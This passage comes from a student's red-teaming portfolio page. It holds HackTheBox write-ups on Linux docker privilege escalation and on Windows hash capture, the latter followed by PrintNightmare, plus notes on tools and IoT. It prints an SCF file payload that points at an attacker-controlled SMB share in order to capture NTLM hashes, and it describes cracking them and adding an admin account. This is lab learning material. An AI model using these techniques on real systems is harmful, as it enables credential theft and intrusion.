                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
